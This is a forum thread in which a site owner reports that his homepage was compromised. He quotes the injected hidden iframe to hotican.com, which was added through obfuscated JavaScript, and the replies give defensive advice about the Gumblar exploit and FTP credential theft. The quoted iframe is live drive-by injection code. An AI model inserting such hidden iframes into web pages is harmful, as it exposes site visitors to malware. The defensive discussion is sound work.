I discovered that my "index.htm" has been hacked.  The following line was inserted, obfuscated in a javascript "eval" statement:

<iframe src="http://hotican.com/" width="1" height="2">

Does anyone know the means that this was done.  I often see my site's pages being accessed in malicious ways, so I am assuming at least one of them worked to accomplish the injection.

This page was last modified on May 20 (last week), but I have an older copy that contained a different version of the hack.  I can't find any malicious access of any of my pages around the file modification time (from the raw access log), so I can't see what the mechanism was.

Does anyone know about this hack?  Anything I can do to protect my site (I already perform validation on parameters passed to my PHP pages, but maybe there's a weakness)?

Thanks
- Matt
http://shadesofgreenphoto.com

I would suggest you take some of the steps mentioned here:

http://www.lunarforums.com/lunarpages_web_hosting_email_pc_security/gumblar_exploit_what_is_it_and_what_should_you_do-t52551.0.html

I don't think the two situations are related (at least I haven't found anything that would say that) however, the advice is general enough to help you out too.  You'll also want to search through your web site and remove any of the offending code that you find.  Last, but not least, be sure to change your passwords too. 

You might also check out this wiki page on the topic:

http://wiki.lunarpages.com/Web_Site_Security_Breaches

Hope that helps!

Yeah, that sounds like Gumblar, or some variation of it. 

After you have cleaned things out once (if using a Windows-based PC) might try logging in via safe mode and running one of the online anti-virus programs to see if it can find any more variants of the infected files. 

Victims of Gumblar and similar drive-by-download exploits have had their FTP credentials stolen by harvesting them from data-stores used by applications like FileZilla and Dreamweaver.

FileZilla stores the information you enter into the Site Manager and if you use the Normal Logintype and enter a username and password, those are stored in an XML file in plain-text.  A safer practice with FileZilla is to choose Interactive for the Logontype.  That way, you will be prompted for them when you connect.  Then use Edit | Clear private data... when you end your session to clear out the quickconnect history and reconnect information.

Don’t like having to remember logon credentials?  Why not use a respectable, dedicated password manager.  One popular free/open-source password manager is KeePass.  Take advantage of it’s random password generator.  This will generate some very ugly passwords you’ll never remember, but you can use its copy/paste or the auto-type feature to make entering your credentials easy.  Use its Password Profiles to tailor the generated password to match the schemes used by the different websites you frequent.  Save the profile and use it next time you change your password.  Use the password expiration feature to remind you to change your password.  If you try it and like it you can make a donation to the project.

You can carry your KeePass environment with you on a secure USB stick like IronKey or SafeStick so you’ll always have it with you.

Since we’re talking about password theft, here are some other things to keep in mind:

Don’t use your browser’s ability to “remember” logon credentials.  Why would you rely on the browser’s password security mechanism when we know browsers are heavily targeted and continually found to have security holes? 

Don’t sign into your sensitive accounts from untrusted computers like “convenient” kiosks.  If you’re on travel and you MUST have access to your accounts, try a product like IronKey and look into their optional Secure Sessions Service.

Don’t access accounts you want to keep secure without using some type of encryption channel such as SSL or TLS, not even from your own computer; this goes for FTP accounts as well.

Remember, security and convenient access are often competing goals; you have to weigh one against the other and decide which is more important to you.

QK